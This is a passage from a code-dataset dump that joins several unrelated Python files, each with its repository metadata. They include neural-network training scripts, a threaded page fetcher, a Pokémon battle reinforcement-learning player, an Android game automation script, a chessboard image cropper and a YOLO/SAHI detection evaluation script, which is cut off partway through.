Kinematics (accx, accy, velx,vely,posx,posy)\n self.inp_size = inp_size\n self.out_size = out_size\n self.n_neurons = n_neurons\n\n # Recurrent layer\n self.rnn = nn.RNNCell(input_size=inp_size,hidden_size=n_neurons,nonlinearity=rnn_nonlinearity)\n\n # Output layer\n self.out_layer = nn.Sequential(nn.Dropout(p=dropout_p),nn.Linear(n_neurons, n_neurons), nn.ReLU(),nn.Linear(n_neurons, out_size))\n\n\n\n\n def forward(self, inp, h_old):\n \"\"\"\n Parameters\n ----------\n inp : torch.tensor, shape (batch_size,self.inp_size)\n Target position and go cue\n h_old : torch.tensor, shape (batch_size, self.n_neurons)\n previous hidden state of recurrent layer\n\n Returns\n -------\n kin : torch.tensor\n has shape (self.out_size,) corresponding to x and y acceleration.\n h_new : torch.tensor\n has shape (n_neurons,). new hidden state\n \"\"\"\n\n\n # New hidden state\n h_new=self.rnn(inp,h_old)\n # Collect RNN output\n kin = self.out_layer(h_new)\n\n return kin, h_new\n\n\nclass RNN_Recursive(nn.Module):\n '''\n Network setup for recurrent control of the cursor\n '''\n def __init__(self, inp_size=3, n_neurons=128, out_size=2, rnn_type = 'relu',dropout_p=.3):\n '''\n Parameters\n ---------\n inp : int\n number of inputs, defaults to 3 (target locations and go cue)\n n_neurons: int\n number of units in hidden layers\n out_size: int\n number of variables to return\n rnn_type: string ['relu','tanh','gru','lstm']\n\n '''\n super(RNN_Recursive, self).__init__()\n\n\n self.inp_size = inp_size\n self.out_size = out_size\n self.n_neurons = n_neurons\n self.rnn_type = rnn_type\n\n\n # Input layers\n # Linear -> ReLU -> Dropout -> Linear -> ReLU -> Dropout\n self.in_layer = nn.Sequential(nn.Linear(inp_size,n_neurons),nn.ReLU(),nn.Dropout(p=dropout_p),\n nn.Linear(n_neurons,n_neurons),nn.ReLU(),nn.Dropout(p=dropout_p))\n\n # Recurrent layer\n if rnn_type == \"gru\":\n self.rnn = nn.GRUCell(input_size=n_neurons,hidden_size=n_neurons)\n elif rnn_type==\"lstm\":\n raise NotImplementedError\n elif rnn_type in ['relu','tanh']:\n self.rnn = nn.RNNCell(input_size=n_neurons,hidden_size=n_neurons,nonlinearity=rnn_nonlinearity)\n else:\n raise NotImplementedError\n\n # Output layers\n # Dropout -> Linear -> ReLU -> Lienear -> Acc\n self.out_layer = nn.Sequential(nn.Dropout(p=.2),nn.Linear(n_neurons, n_neurons), nn.ReLU(),nn.Linear(n_neurons, out_size))\n\n\n def forward(self, inp, h_old):\n \"\"\"\n Parameters\n ----------\n inp : torch.tensor\n Hand and target positions. Has shape (7,).\n (go, hand_x, hand_y, curr_tgx, curr_tgy, next_tgx, next_tgy)\n h_old : torch.tensor\n Initial firing rates. Has shape (n_neurons,)\n task_info : torch.tensor\n tensor holding (go, curr_tgx, curr_tgy, next_tgx, next_tgy)\n\n Returns\n -------\n acc : torch.tensor\n has shape (2,) corresponding to x and y acceleration.\n h_new : torch.tensor\n has shape (n_neurons,), new hidden state of recurrent network\n \"\"\"\n\n x = self.in_layer(inp)\n\n # Update RNN one time step.\n h_new = self.rnn(x, h_old)\n\n # Collect RNN output (acceleration of hand).\n acc = self.out_layer(h_new)\n\n return acc, h_new\n","repo_name":"markplitt/CS230Project","sub_path":"supervised_models.py","file_name":"supervised_models.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18463975671","text":"# _*_ coding: utf-8 _*_\n\n\"\"\"\nother_threads.py by xianhu\n\"\"\"\n\nimport time\nimport queue\nimport logging\nimport threading\nimport urllib.request\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s\\t%(levelname)s\\t%(message)s\")\n\ng_url_queue = queue.Queue()\ng_save_queue = queue.Queue()\n\n\ndef url_fetch_func(name):\n \"\"\"\n url fetch function\n \"\"\"\n logging.debug(\"url_fetch_func name=%s start\", name)\n while g_url_queue.qsize() > 0 or g_save_queue.qsize() > 0:\n try:\n url = g_url_queue.get(timeout=10)\n logging.debug(\"url_fetch_func name=%s fetch_url=%s\", name, url)\n g_save_queue.put(urllib.request.urlopen(url).geturl())\n time.sleep(1)\n except:\n pass\n logging.debug(\"url_fetch_func name=%s exit\", name)\n return\n\n\ndef save_items_func(name):\n \"\"\"\n save items function\n \"\"\"\n logging.debug(\"save_items_func name=%s start\", name)\n while True:\n logging.debug(\"save_items_func name=%s save_url=%s\", name, g_save_queue.get())\n time.sleep(1)\n if g_save_queue.qsize() == 0 and g_url_queue.qsize() == 0:\n break\n logging.debug(\"save_items_func name=%s exit\", name)\n return\n\n\nif __name__ == '__main__':\n for i in range(1, 21):\n g_url_queue.put(item=\"http://zhushou.360.cn/list/index/cid/2?page=%d\" % i)\n\n threads = [threading.Thread(target=url_fetch_func, args=(str(i),)) for i in range(2)]\n threads.append(threading.Thread(target=save_items_func, args=(\"save\",)))\n\n for th in threads:\n th.setDaemon(True)\n th.start()\n\n for th in threads:\n if th.is_alive():\n th.join()\n\n exit()\n","repo_name":"Java-via/AppSpider","sub_path":"others/other_threads.py","file_name":"other_threads.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22698592502","text":"import argparse\nimport logging\nimport os\nimport re\nimport sys\n\nimport numpy as np\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport csv\n\nimport utils\nimport model.net as net\nimport model.two_labels_data_loader as two_labels_data_loader\nfrom evaluate import evaluate\nfrom train import train\nimport display_digit as display_results\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--parent_dir', default=\"C:/Users/H/Documents/Haifa Univ/Thesis/DL-Pytorch-data\", help='path to experiments and data folder. not for Server')\nparser.add_argument('--data_dir', default='data/two-labels/data-two-labels-big', help=\"Directory containing the destination dataset\")\nparser.add_argument('--model_dir', default='experiments/transfer_training_model/in-debug',\n help=\"Directory containing params.json\")\nparser.add_argument('--restore_file', default='best',\n help=\"Optional, name of the file in --model_dir containing weights to reload before \\\n training\") # 'best' or 'train'\n# added by me\nparser.add_argument('--model_out_dir', default='experiments/transfer_training_model/out-debug',\n help=\"Directory to write transfer results\")\n\n\ndef load_model(model_dir, restore_file):\n # reload weights from restore_file if specified\n if restore_file is not None and model_dir is not None:\n restore_path = os.path.join(model_dir, restore_file + '.pth.tar')\n logging.info(\"Restoring parameters from {}\".format(restore_path))\n utils.load_checkpoint(restore_path, model, None) # optimizer)\n return\n\n\ndef get_network_grads(net):\n weight_string = \"weight\"\n bias_string = \"bias\"\n output_gradients = []\n output_names = []\n\n parameters_names = list(net.state_dict().keys())\n j = 0\n for i in range(len(parameters_names)):\n par = parameters_names[i - j]\n is_rel_w = re.search(weight_string, par)\n is_rel_b = re.search(bias_string, par)\n if is_rel_w is None and is_rel_b is None:\n parameters_names.remove(par)\n j += 1\n\n for name, param in net.named_parameters():\n if name in parameters_names:\n all_net_grads = param.grad.data.cpu().numpy().tolist()\n flat_net_grads = []\n if isinstance(all_net_grads, (list,)):\n\n for elem in all_net_grads:\n if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n for item in elem:\n flat_net_grads.extend(item)\n elif isinstance(elem, (list,)):\n flat_net_grads.extend(elem)\n else:\n flat_net_grads.extend([elem])\n else:\n flat_net_grads = all_net_grads\n\n output_gradients.append([min(flat_net_grads), np.median(flat_net_grads), max(flat_net_grads)])\n output_names.append(name)\n\n return output_gradients, output_names\n\n\ndef collect_network_statistics(net):\n\n status_net = []\n net_grads_graph = []\n\n for param_tensor in net.state_dict():\n\n status_net.append([param_tensor,\n (net.state_dict()[param_tensor].norm()).item(),\n list(net.state_dict()[param_tensor].size())])\n\n all_net_grads = ((net.state_dict()[param_tensor]).cpu().numpy()).tolist()\n\n # if needed, flatten the list to get one nim and one max\n flat_net_grads = []\n if isinstance(all_net_grads, (list,)):\n\n for elem in all_net_grads:\n if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n for item in elem:\n flat_net_grads.extend(item)\n elif isinstance(elem, (list,)):\n flat_net_grads.extend(elem)\n else:\n flat_net_grads.extend([elem])\n else:\n flat_net_grads = all_net_grads\n\n net_grads_graph.append([min(flat_net_grads), max(flat_net_grads)])\n\n return net_grads_graph\n\n\ndef after_transfer_train_and_evaluate(model, train_dataloader, dev_dataloader, optimizer, loss_fn, metrics, incorrect, correct_fn, params, model_dir, model_out_dir, restore_file):\n\n best_dev_acc = 0.0\n\n fig = display_results.create_figure()\n\n for epoch in range(params.num_epochs):\n # Run one epoch\n logging.info(\"Epoch {}/{}\".format(epoch + 1, params.num_epochs))\n\n # compute number of batches in one epoch (one full pass over the training set)\n train(model, optimizer, loss_fn, train_dataloader, metrics, params, epoch, fig, model_out_dir, losses, grayscale=True)\n\n # Evaluate for one epoch on validation set\n dev_metrics, incorrect_samples, correct_samples = evaluate(model, loss_fn, dev_dataloader, metrics, incorrect, correct_fn, params, epoch)\n\n dev_acc = dev_metrics['accuracy_two_labels']\n is_best = dev_acc >= best_dev_acc\n\n grads_graph, _ = get_network_grads(model)\n vals_graph = collect_network_statistics(model)\n\n grads_per_epoch.append(grads_graph)\n vals_per_epoch.append(vals_graph)\n\n\n # Save weights\n utils.save_checkpoint({'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'optim_dict': optimizer.state_dict()},\n is_best=is_best,\n checkpoint=model_out_dir)\n\n # If best_eval, best_save_path\n if is_best:\n logging.info(\"- Found new best accuracy\")\n print(\"Epoch {}/{}\".format(epoch + 1, params.num_epochs))\n print(\"- Found new best accuracy\")\n best_dev_acc = dev_acc\n print(\"accuracy is {:05.3f}\".format(best_dev_acc))\n print(\"loss is {:05.3f}\".format(dev_metrics['loss']))\n\n # Save best val metrics in a json file in the model directory\n best_json_path = os.path.join(model_out_dir, \"metrics_dev_best_weights.json\")\n utils.save_dict_to_json(dev_metrics, best_json_path, epoch + 1)\n\n best_csv_path = os.path.join(model_out_dir, \"incorrect_best_samples.csv\")\n utils.save_incorrect_to_csv(incorrect_samples, best_csv_path)\n\n # Save latest val metrics in a json file in the model directory\n last_json_path = os.path.join(model_out_dir, \"metrics_dev_last_weights.json\")\n utils.save_dict_to_json(dev_metrics, last_json_path, epoch + 1)\n\n last_csv_path = os.path.join(model_out_dir, \"incorrect_last_samples.csv\")\n utils.save_incorrect_to_csv(incorrect_samples, last_csv_path)\n\n accuracy.append(dev_acc)\n\n display_results.close_figure(fig)\n\n return\n\n\ndef plot_summary_graphs_layers(vals_to_plot, v_type, im_path):\n vals_np = np.array(vals_to_plot)\n for it in range(vals_np.shape[1]):\n val = vals_np[:, it].tolist()\n layer_indx = it // 2\n if it % 2: # odd row numbers store bias vals\n display_results.plot_graph(val, None, \"{}_layer_bias_{}\".format(v_type, layer_indx), im_path)\n print('{}_layer_bias_{} graph plotted'.format(v_type, layer_indx))\n else: # even row numbers store weight vals\n display_results.plot_graph(val, None, \"{}_layer_weight_{}\".format(v_type, layer_indx), im_path)\n print('{}_layer_weight_{} graph plotted'.format(v_type, layer_indx))\n\n return\n\n\nif __name__ == '__main__':\n\n # Load the parameters from json file\n args = parser.parse_args()\n if args.parent_dir and not torch.cuda.is_available():\n os.chdir(args.parent_dir)\n\n json_path = os.path.join(args.model_out_dir, 'params.json')\n assert os.path.isfile(json_path), \"No json configuration file found at {}\".format(json_path)\n params = utils.Params(json_path)\n\n # use GPU if available\n params.cuda = torch.cuda.is_available()\n\n # # Set the random seed for reproducible experiments\n # torch.manual_seed(230)\n # if params.cuda:\n # torch.cuda.manual_seed(230)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Set the logger # for output model\n utils.set_logger(os.path.join(args.model_out_dir, 'train.log'))\n\n # Create the input data pipeline\n logging.info(\"Loading the datasets...\")\n\n # fetch dataloaders\n dataloaders = two_labels_data_loader.fetch_dataloader(['train', 'dev'], args.data_dir, params)\n train_dl = dataloaders['train']\n dev_dl = dataloaders['dev']\n\n logging.info(\"data was loaded from {}\".format(args.data_dir))\n logging.info(\"- done.\")\n\n num_of_batches = max(1, len(train_dl.dataset) // train_dl.batch_size)\n logging.info(\"data-set size: {}\".format(len(train_dl.dataset)))\n logging.info(\"number of batches: {}\".format(num_of_batches))\n\n # Define the model and optimizer\n model = net.NeuralNet(params).cuda() if params.cuda else net.NeuralNet(params)\n\n load_model(args.model_dir, args.restore_file)\n\n print(model)\n logging.info(\"network structure is\")\n logging.info(\"{}\".format(model))\n\n # status_before_transfer = []\n # for param_tensor in model.state_dict():\n # status_before_transfer.append([param_tensor,\n # (model.state_dict()[param_tensor].norm()).item(), list(model.state_dict()[param_tensor].size())])\n # status_before_transfer.append(((model.state_dict()[param_tensor]).cpu().numpy()).tolist())\n\n # changing last fully connected layer\n num_ftrs = model.fc4.in_features\n model.fc4 = nn.Linear(num_ftrs, 20) # 10)\n\n model = model.to(device)\n\n print(model)\n logging.info(\"network structure after transfer is\")\n logging.info(\"{}\".format(model))\n\n optimizer = torch.optim.SGD(model.parameters(), lr=params.learning_rate)\n\n # fetch loss function and metrics\n loss_fn = net.loss_fn_two_labels\n\n metrics = net.metrics\n incorrect = net.incorrect_two_labels\n correct_fn = net.correct_classification_two_labels\n\n losses = []\n accuracy = []\n grads_per_epoch = []\n vals_per_epoch = []\n\n # Train the model\n logging.info(\"Starting training for {} epoch(s)\".format(params.num_epochs))\n after_transfer_train_and_evaluate(model, train_dl, dev_dl, optimizer, loss_fn, metrics, incorrect, correct_fn, params,\n args.model_dir, args.model_out_dir, args.restore_file)\n\n # load_model(args.model_out_dir, args.restore_file)\n #\n # status_after_transfer = []\n # for param_tensor in model.state_dict():\n # status_after_transfer.append([param_tensor,\n # (model.state_dict()[param_tensor].norm()).item(), list(model.state_dict()[param_tensor].size())])\n # status_after_transfer.append(((model.state_dict()[param_tensor]).cpu().numpy()).tolist())\n #\n # filepath = os.path.join(args.model_out_dir, 'wb_ext.csv')\n # with open(filepath, \"w\", newline='') as myfile:\n # csvwr = csv.writer(myfile)\n # for elem in status_before_transfer:\n # if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n # for row in elem:\n # csvwr.writerow(row)\n # else:\n # csvwr.writerow(elem)\n # for elem_a in status_after_transfer:\n # if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n # for row in elem:\n # csvwr.writerow(row)\n # else:\n # csvwr.writerow(elem)\n\n print('plotting graphs')\n display_results.plot_graph(losses, None, \"General Loss\", args.model_out_dir)\n print('loss graph plotted')\n display_results.plot_graph(accuracy, None, \"General dev accuracy\", args.model_out_dir)\n print('accuracy graph plotted')\n\n plot_summary_graphs_layers(grads_per_epoch, 'Grads', args.model_out_dir)","repo_name":"Hadar-Sha/Deep-Learning","sub_path":"pytorch/schi/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":11880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32590806674","text":"from asyncio import Queue\nfrom typing import Dict\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport torch\nfrom poke_env.environment.battle import Battle\nfrom poke_env.player.battle_order import BattleOrder\nfrom poke_env.player.env_player import Gen8EnvSinglePlayer\nfrom poke_env.player_configuration import PlayerConfiguration\nfrom poke_env.server_configuration import ServerConfiguration\nfrom poke_env.teambuilder.teambuilder import Teambuilder\n\nfrom champion_league.preprocessor import Preprocessor\nfrom champion_league.reward.reward_scheme import RewardScheme\n\n\nclass RLPlayer(Gen8EnvSinglePlayer):\n _ACTION_SPACE = list(range(4 * 2 + 6))\n\n def __init__(\n self,\n preprocessor: Preprocessor,\n reward_scheme: RewardScheme,\n player_configuration: Optional[PlayerConfiguration] = None,\n *,\n avatar: Optional[int] = None,\n battle_format: str = \"gen8randombattle\",\n log_level: Optional[int] = None,\n server_configuration: Optional[ServerConfiguration] = None,\n start_timer_on_battle_start: bool = False,\n start_listening: bool = True,\n team: Optional[Union[str, Teambuilder]] = None,\n ) -> None:\n \"\"\"Player class that will act as the league. Whenever the game ends, call change_agent() to\n change the agent playing the game. Allows sampling of self-play, league-play, and exploiting\n\n Parameters\n ----------\n preprocessor: Preprocessor\n The preprocessor for the agent.\n player_configuration: Optional[PlayerConfiguration]\n Player configuration. If empty, defaults to an\n automatically generated username with no password. This option must be set\n if the server configuration requires authentication.\n avatar: Optional[int]\n Player avatar id. Optional.\n battle_format: Optional[str]\n Name of the battle format this player plays. Defaults to\n gen8randombattle.\n log_level: Optional[int]\n The player's logger level.\n server_configuration: Optional[ServerConfiguration]\n Server configuration. Defaults to Localhost Server Configuration\n start_timer_on_battle_start: bool\n Whether to start the battle timer\n start_listening: bool\n Whether to start listening to the server. Defaults to True\n team: Optional[Union[str, Teambuilder]]\n The team to use for formats requiring a team. Can be a showdown team string, a showdown\n packed team string, or a ShowdownTeam object. Defaults to None.\n \"\"\"\n\n super().__init__(\n player_configuration,\n avatar=avatar,\n battle_format=battle_format,\n log_level=log_level,\n server_configuration=server_configuration,\n start_timer_on_battle_start=start_timer_on_battle_start,\n start_listening=start_listening,\n team=team,\n )\n self.reward_scheme = reward_scheme\n self._max_concurrent_battles = 2\n self._battle_count_queue = Queue(2)\n self.preprocessor = preprocessor\n\n def embed_battle(self, battle: Battle) -> Dict[str, torch.Tensor]:\n \"\"\"Abstract function for embedding a battle using the chosen preprocessor\n\n Parameters\n ----------\n battle: Battle\n The raw battle data returned from Showdown!\n\n Returns\n -------\n torch.Tensor\n The battle converted into something readable by the network.\n \"\"\"\n return self.preprocessor.embed_battle(battle=battle)\n\n def compute_reward(self, battle: Battle) -> Dict[str, float]:\n \"\"\"Function for determining the reward from the current gamestate\n\n Args:\n battle: The current state of the game\n\n Returns:\n Dict[str, float]: The reward, determined by the state\n \"\"\"\n return self.reward_scheme.compute(battle)\n\n def step(\n self, action: int\n ) -> Tuple[Battle, Dict[str, float], bool, Dict[str, int]]:\n \"\"\"Function for stepping the environment\n\n Args:\n action: int\n\n Returns:\n Tuple[Battle, Dict[str, float], bool, Dict[str, int]]: obs, reward, done, info\n \"\"\"\n obs, reward, done, _ = super().step(action)\n return obs, reward, done, {\"won\": 1 if self._current_battle.won else 0}\n\n def _action_to_move(self, action: int, battle: Battle) -> BattleOrder:\n \"\"\"Converts the action index to the format readable by Showdown!\n\n Parameters\n ----------\n action: int\n The action that is to be performed\n battle: Battle\n The current gamestate\n\n Returns\n -------\n BattleOrder\n The action that is to be performed, in a format readable by Showdown!\n \"\"\"\n if (\n action < 4\n and action < len(battle.available_moves)\n and not battle.force_switch\n ):\n return self.create_order(battle.available_moves[action])\n elif 0 <= action - 4 < len(battle.available_switches):\n return self.create_order(battle.available_switches[action - 4])\n else:\n return self.choose_random_move(battle)\n\n def reset(self) -> Dict[str, torch.Tensor]:\n self.reward_scheme.reset()\n self.preprocessor.reset()\n return super().reset()\n","repo_name":"alex-nooj/champion_league","sub_path":"champion_league/env/rl_player.py","file_name":"rl_player.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70256363690","text":"import sys\ndef get_a_float(prompt):\n\tproblem_with_input=True\n\twhile(problem_with_input):\n\t\tsys.stdout.write(prompt)\n\t\ttry:\n\t\t\tuser_entered_float = float( sys.stdin.readline() )\n\t\t\tproblem_with_input=False\n\t\texcept ValueError:\n\t\t\tsys.stdout.write(\"You must enter a number!\\n\")\n\treturn user_entered_float\n\ndef get_an_int(prompt):\n\treturn int( get_a_float(prompt) )\n\ndef average_earnings_calculator_v2():\n\ttotal_income = get_a_float(\"Enter your total income for 2020: \")\n\tnum_days_worked = get_an_int(\"Enter number of days worked in 2020: \")\n\ttry:\n\t\taverage_income_per_day = total_income / num_days_worked\n\t\tsys.stdout.write(\"You've earned an average daily income of $\"+str(average_income_per_day))\n\texcept ZeroDivisionError:\n\t\tsys.stdout.write(\"Sorry, we can't calculate the average daily earnings!\")\n\naverage_earnings_calculator_v2()\n","repo_name":"AshOConnor/Python","sub_path":"average_earning_calculations.py","file_name":"average_earning_calculations.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17508396210","text":"import cv2\nimport time\nfrom typing import Optional\n\nimport numpy as np\n\nfrom definition import Tasks, Actions\nfrom predict import Predictor\nimport scrcpy\n\n\ndef visualize_frame(frame, point):\n frame = frame.copy()\n cv2.circle(frame, point, 3, (0, 0, 255), -1)\n cv2.imshow(\"viz\", frame)\n cv2.waitKey()\n\n\nif __name__ == \"__main__\":\n predictor = Predictor()\n client = scrcpy.Client(max_width=1280, max_fps=10)\n client.start(True)\n\n tasks = [\n Tasks.Home,\n Tasks.Email,\n Tasks.Home,\n Tasks.FriendFoundation,\n Tasks.Home,\n Tasks.Shopping,\n Tasks.Home,\n Tasks.RecentBattle\n ] + [Tasks.Battle] * 6 + [\n Tasks.Home,\n Tasks.Task,\n Tasks.Home\n ]\n\n last_frame: Optional[np.ndarray] = None\n finish_count = 0\n\n while len(tasks) > 0:\n if client.last_frame is None or (client.last_frame == last_frame).all():\n continue\n last_frame = client.last_frame\n\n action, score, (x, y) = predictor.predict(last_frame, tasks[0].value)\n # visualize_frame(last_frame, (x, y))\n print(action, score)\n if action == Actions.Finish:\n print(f\"{tasks[0]} 已完成\")\n finish_count += 1\n if finish_count >= 3:\n tasks.pop(0)\n else:\n finish_count = 0\n if action == Actions.Touch:\n print(tasks[0], action, score, (x, y))\n client.control.touch(x, y, scrcpy.ACTION_DOWN)\n client.control.touch(x, y, scrcpy.ACTION_UP)\n time.sleep(1)\n time.sleep(0.3)\n","repo_name":"leng-yue/ai-arkhelper","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20744918127","text":"import cv2 as cv\nimport imutils\nimport os\nimage=cv.imread(\"Docu.jpeg\")\n#image=imutils.resize(image,height=400,width=400)\ndef piece_from_img(img):\n dx = img.shape[0] // 8\n dy = img.shape[1] // 8\n # mat = []\n for i in range(0, 8):\n # lis = []\n for j in range(0, 8):\n #points = [[i * dx, j * dy], [(i + 1) * dx, j * dy], [i * dx, (j + 1) * dy], [(i + 1) * dx, (j + 1) * dy]]\n out_image=img[j*dy:(j+1)*dy,i * dx:(i+1)*dx]\n yield out_image\n # lis.append(output)\n # cv.imshow(str(i) + str(j), output)\n # mat.append(lis)\n\ndef extract_piece(image,page):\n img = cv.Canny(image, 2, 10)\n # cv.imshow(\"sh\", img)\n # cv.waitKey(0)\n croppedlis = []\n contours, hierarchy = cv.findContours(img, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv.contourArea(cnt)\n if area > (img.shape[0] * img.shape[1] * 1 / 12): # IMPORTANT:add square condition\n cv.drawContours(image, cnt, -1, (255, 100, 100), 3)\n peri = cv.arcLength(cnt, True)\n approx = cv.approxPolyDP(cnt, 0.02 * peri, False) # getting the boounding box\n x, y, w, h = cv.boundingRect(approx)\n croppedlis.append(image[y:y + h, x:x + w])\n\n #print(area)\n #cv.imshow(\"shs\", image)\n for i in range(len(croppedlis)):\n\n itera = piece_from_img(croppedlis[i])\n while True:\n try:\n yield next(itera)\n except StopIteration:\n break\n #name=\"page_\"+str(page)+\"image\"+str(i+1)+r\".png\"\n #cv.imwrite(name, croppedlis[i])\n #cv.imshow(str(i), croppedlis[i])\n\nos.chdir(r\"C:\\Users\\suhaa\\Desktop\\OCV\\Chess_Detector\\Saves\")\n# extract(image,1)\n","repo_name":"neel2299/Chess_Detector","sub_path":"extract_piece.py","file_name":"extract_piece.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37519647943","text":"import airsim\nimport ultralytics\nimport pandas\nfrom ultralytics import YOLO\nfrom ultralytics.engine.results import Results\nfrom sahi.prediction import PredictionResult\nimport os\nimport json\nimport math\nimport numpy as np\nimport polars as pl\nfrom pathlib import Path\nfrom sahi.predict import get_prediction, get_sliced_prediction, predict\nfrom sahi import AutoDetectionModel\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\n\ndef training(config):\n \"\"\"\n Train yolo model based on .yaml configuration file\n Parameters\n ----------\n config, str :\n String path to the .yaml config file\n\n Returns\n -------\n\n \"\"\"\n model = YOLO()\n model.train(cfg=config)\n\n\ndef predict_sahi(weight_path, list_img, slice, overlap, conf,\n device): # batch_size manually changed to 4 for faster result\n \"\"\"\n Predict using sahi based on given parameters\n Parameters\n ----------\n weight_path, str :\n String of the path for the model weights\n list_img, list[Path] :\n List of the path of each images\n slice, list[int, int] :\n List containing width and height of a slice (without overlap)\n overlap, list[int,int] :\n List containing width and height ratio of the overlap\n conf, float\n confidence threshold to count the prediction as valid\n device, int or str :\n define the device use either CPU or GPU\n\n Returns\n -------\n\n \"\"\"\n sahi_model = AutoDetectionModel.from_pretrained(\n model_type='yolov8',\n model_path=weight_path,\n confidence_threshold=conf,\n device=device\n )\n result = {}\n for i in tqdm(list_img):\n result[i.stem] = (get_sliced_prediction(str(i),\n sahi_model,\n slice_width=slice[0],\n slice_height=slice[1],\n overlap_width_ratio=overlap[0],\n overlap_height_ratio=overlap[1],\n verbose=0),)\n return result\n\n\ndef get_img_log(img_name, log_path):\n \"\"\"\n Load the data of one image in the log file\n Parameters\n ----------\n img_name, str :\n name of the image\n log_path, Path :\n Path of the log file\n\n Returns, dict :\n Dict containing the image parameters and data in the simulation\n -------\n\n \"\"\"\n sim_number, frame_number, _ = img_name.split(\"_\")\n sim_number = str(int(sim_number))\n frame_number = str(int(frame_number))\n with open(log_path) as json_file:\n sim_log = json.load(json_file)\n result_dict = sim_log[sim_number][\"frame_data\"][frame_number]\n dict_items = list(result_dict.items())\n dict_items.insert(2, (\"weather\", sim_log[sim_number][\"weather\"]))\n\n return dict(dict_items)\n\n\ndef reformat_predict(result_dict):\n \"\"\"\n Change result to common result dict format between Yolov8 and SAHI\n Parameters\n ----------\n result_dict, result from Prediction (SAHI or normal YOLO)\n\n Returns, dict :\n Common result format\n -------\n\n \"\"\"\n # bbx format xmax,ymax,xmin,ymin\n return_dict = {}\n counter = 1\n if type(result_dict) == Results:\n for pred in result_dict.boxes.data.tolist():\n return_dict[counter] = {\"class\": int(pred[5]),\n \"bbx\": [pred[2], pred[3], pred[0], pred[1]],\n \"conf\": pred[4]}\n counter += 1\n elif type(result_dict[0]) == PredictionResult:\n for pred in result_dict[0].object_prediction_list:\n return_dict[counter] = {\"class\": pred.category.id,\n \"bbx\": [pred.bbox.maxx, pred.bbox.maxy,\n pred.bbox.minx, pred.bbox.miny],\n \"conf\": pred.score.value}\n counter += 1\n return return_dict\n\n\ndef compute_iou(box1, box2):\n \"\"\"\n Compute the IoU between 2 bbx\n Parameters\n ----------\n box1, list[int] :\n [xmax, ymax, xmin, ymin]\n box2, list[int] :\n [xmax, ymax, xmin, ymin]\n\n Returns\n -------\n\n \"\"\"\n xmax1, ymax1, xmin1, ymin1 = box1\n xmax2, ymax2, xmin2, ymin2 = box2\n x_left = max(xmin1, xmin2)\n y_top = max(ymin1, ymin2)\n x_right = min(xmax1, xmax2)\n y_bottom = min(ymax1, ymax2)\n if x_right < x_left or y_bottom < y_top:\n return 0.0\n intersection_area = (x_right - x_left) * (y_bottom - y_top)\n box1_area = (xmax1 - xmin1) * (ymax1 - ymin1)\n box2_area = (xmax2 - xmin2) * (ymax2 - ymin2)\n union_area = box1_area + box2_area - intersection_area\n iou = intersection_area / union_area\n return iou\n\n\ndef add_to_df2(df, img_log, pred_result, img_path, IOU_threshold):\n \"\"\"\n Add a row to the polars dataframe depending on the prediction result\n Parameters\n ----------\n df, Polars dataframe :\n The current polars dataframe\n img_log, dict :\n Dict containing the image data from the log\n pred_result, dict :\n Prediction data made by the model\n img_path, Path :\n Image path\n IOU_threshold, float :\n Value of the IoU threshold to be considered a valid prediction\n\n Returns\n -------\n\n \"\"\"\n angle = img_path.stem.split(\"_\")[2]\n list_key = [key for key in list(img_log.keys())[4:] if key.split(\"_\")[0] == angle]\n pred_per_key = {}\n for key in list_key:\n pred_per_key[key] = 0\n for pred_key in pred_result.keys():\n max_IOU = -1\n best_key = None\n for key in list_key:\n truth_box = [img_log[key][\"label\"][\"box2D\"][\"x_max\"],\n img_log[key][\"label\"][\"box2D\"][\"y_max\"],\n img_log[key][\"label\"][\"box2D\"][\"x_min\"],\n img_log[key][\"label\"][\"box2D\"][\"y_min\"]]\n key_IOU = compute_iou(pred_result[pred_key][\"bbx\"], truth_box)\n if max_IOU < key_IOU:\n max_IOU = key_IOU\n best_key = key\n if max_IOU >= IOU_threshold:\n # save as TP\n truth_box = [img_log[best_key][\"label\"][\"box2D\"][\"x_max\"],\n img_log[best_key][\"label\"][\"box2D\"][\"y_max\"],\n img_log[best_key][\"label\"][\"box2D\"][\"x_min\"],\n img_log[best_key][\"label\"][\"box2D\"][\"y_min\"]]\n\n new_img_row_data = {\n 'Img_path': [str(img_path)],\n 'Weather_param': [img_log[\"weather\"][\"param\"]],\n 'Weather_value': [img_log[\"weather\"][\"val\"]],\n 'Level': [img_log[\"currentlevel\"]],\n 'Timeoftheday': [img_log[\"timeoftheday\"]],\n 'Yolo_class_truth': [img_log[best_key][\"label\"][\"yolo_class\"]],\n 'Yolo_class_pred': [pred_result[pred_key][\"class\"]],\n 'Conf': [pred_result[pred_key][\"conf\"]],\n 'Object_name': [img_log[best_key][\"label\"][\"name\"]],\n 